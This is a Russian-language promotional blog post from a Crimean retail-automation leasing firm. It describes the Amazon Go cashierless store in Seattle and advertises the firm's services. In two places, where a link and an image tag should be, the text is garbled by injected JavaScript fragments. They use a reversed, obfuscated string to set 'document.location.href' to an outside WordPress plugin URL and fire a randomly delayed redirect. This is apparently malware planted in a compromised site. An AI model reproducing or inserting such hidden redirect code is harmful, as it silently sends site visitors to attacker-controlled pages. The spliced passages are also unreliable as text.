Будущее наступило: «Amazon Go» — магазин без касс и очередей

Уважаемые клиенты, сегодня публикуем для Вас новость, которая всех нас пока напрямую не касается, зато вдохновляет шаг за шагом строить для своих клиентов комфортный мир будущего. В Сиэттле (США) открылся первый в мире магазин, использующий революционные технологии организации торговли. По концепции формата, клиент заходит в магазин (через турникет, идентифицировавшись через смартфон, по QR-коду), берет с полок нужные ему товары и просто уходит (тоже через турникет, но без сканирования штрих-кодов или вытаскивания бумажника). Но коммунизм не пройдет: со специального банковского счета вскоре списывается стоимость выбранных каждым клиентом товаров. По иронии, чтобы в числе первых испытать процесс совершения покупок без очередей, первым покупателям пришлось отстоять длинную очередь.

Захват планеты Скайнэтом пока откладывается: живые сотрудники в магазине тоже есть — раскладывают товары по полкам, консультируют и готовят еду (фасованные по коробкам завтраки, ланчи, ужины и снэки). А вот отслеживают покупки продолжающее работать в фоновом режиме приложение, камеры видеонаблюдения, RFID-метки и сенсоры. Если покупатель передумал, то он может положить товар обратно на полку — и вещь будет удалена из списка покупок. Рекламный видео-ролик от Amazon позволяет узнать подробности процесса совершения покупок. А этот ролик канала-девятимиллионника Rooster Teeth тонко иронизирует на тему защищенности такого магазина от краж. Кстати, меры безопасности пока не разглашаются. Площадь магазина — около 170 квадратный метров. Для совершения покупок потребуется предварительно установить на смартфон бесплатное приложение для iOS или Android.

Все инновации направлены на решение главных тактических задач, стоящих перед любым магазином самообслуживания, — ускорение потока покупателей, экономия их времени, повышение комфорта процесса совершения покупок, что в конечном итоге ведет к повышению конкурентоспособности и увеличению количества клиентов. Именно увеличение потока клиентов позволяет и мотивирует инвестировать в автоматизацию процесса торговли. Amazon сделал уже следующий шаг к идеальному магазину, далеко не последний. Не опережает ли идея свое время, сможет ли компания конкурировать с традиционными супермаркетами после развертывания торговой сети — покажет время. Любопытно, где рынок проложит грань между удорожанием системы автоматизации и дополнительной выгодой от прихода очень ценящих свое время покупателей.

А крымчане прямо сейчас могут наблюдать повсеместное (пока по большей части в городах) вытеснение традиционных «магазинов у дома» мини-маркетами. На той же довольно скромной площади удается организовать магазин самообслуживания, а кассир на выходе «пробивает» товары и рассчитывает покупателя в разы быстрее, чем сонная продавщица, ползающая за прилавком под диктовку покупателя. Продавец может одновременно работать лишь с одним клиентом, а даже в небольшом магазине самообслуживания одновременно могут комфортно, читая сроки хранения и состав, набирать себе в корзину товары около 10 человек. Если Вы тоже хотите не отставать от рынка, начать полностью контролировать работу торгового персонала, повысить лояльность клиентов и увеличить дополнительную прибыль, обращайтесь на «Таврию-Лизинг». Наши специалисты помогут грамотно реализовать Ваши идеи или предложат свои рекомендации по автоматизации любого предприятия торговли или сферы услуг. Вы удивитесь, узнав с каких скромных сумм инвестиций начинаются toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor-standart-s-fn/»>варианты организации минимального товарного учета и ускоренного обслуживания покупателей.

Интересно, как скоро хотя бы полки вдоль стен станут автоматически заполняться товарами, как в вендинговом аппарате. Да и живых консультантов технологии AI уже сейчас по большей части позволяют заменить чем-то вроде встроенной в стенку Siri (Amazon «дружит» с Apple). Удивительно, но ценники в магазине вполне обычные, печатные, хотя электронный ценник — решение не новое. А какие технологии Вы представляете в магазине будущего, которое еще не наступило? Делитесь мнениями под этой записью в нашей официальной группе ВКонтакте (куда уже подписано более 600 ваших коллег).

Статья от 09.04.2018. на Geektimes «Покупки в Amazon Go»

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tores-super-169.jpg» alt=»» width=»1100″ height=»619″ class=»alignnone size-full wp-image-3516″ />